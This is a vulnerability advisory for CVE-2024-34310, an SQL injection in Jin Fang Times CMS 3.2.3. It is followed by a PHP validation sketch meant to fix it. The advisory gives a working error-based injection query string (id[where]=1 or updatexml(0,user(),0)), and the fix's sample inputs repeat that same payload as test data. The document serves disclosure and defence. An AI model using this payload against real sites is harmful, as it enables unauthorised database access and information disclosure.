# CVE-2024-34310
> [Suggested description]
> Jin Fang Times Content Management System v3.2.3 was discovered to
> contain a SQL injection vulnerability via the id parameter.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> https://www.bjjfsd.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Jin Fang times content management system - 3.2.3
>
> ------------------------------------------
>
> [Affected Component]
> public function data_show($id = 0) {
>     if (empty($id)) {
>         $this->redirect('index');
>     }
>     $info = M('News')->find($id);
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
>
> ------------------------------------------
>
> [Discoverer]
> yishan
>
> ------------------------------------------
>
> [Reference]
> http://jin.com
> https://www.bjjfsd.com/
Use CVE-2024-34310.
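
A mitigation sketch for the component quoted above, added here as an example and not taken from the vendor's code. PHP parses a query string of the form `id[where]=...` into an array, so `find($id)` receives an array instead of a scalar key; the hypothetical helper `strict_id()` accepts only a plain positive decimal integer and rejects everything else before the value reaches the model.

```php
<?php
// Added example: strict_id() is a hypothetical helper, not part of the CMS.

/**
 * Return a positive integer id, or null when the request value is not a
 * plain decimal integer.
 */
function strict_id($raw)
{
    // id[where]=... arrives as array('where' => '...'); only scalars are acceptable.
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $raw = (string) $raw;
    // ctype_digit rejects '', signs, spaces and any appended SQL text;
    // the 9-digit cap keeps the cast inside a 32-bit signed integer.
    if (!ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Constructed sample inputs, shaped as PHP would populate $_GET['id'].
$samples = array(
    'plain id'                     => '42',
    'array form from the advisory' => array('where' => '1 or updatexml(0,user(),0)'),
    'trailing SQL text'            => '1 or 1=1',
    'zero'                         => '0',
);
foreach ($samples as $label => $value) {
    $id = strict_id($value);
    echo str_pad($label, 30), ' => ',
        $id === null ? 'rejected' : "accepted ($id)", PHP_EOL;
}

// How the controller method could use it (sketch, same calls as the excerpt):
// public function data_show($id = 0) {
//     $id = strict_id($id);
//     if ($id === null) {
//         $this->redirect('index');
//         return;
//     }
//     $info = M('News')->find($id); // $id is now always an int
// }
```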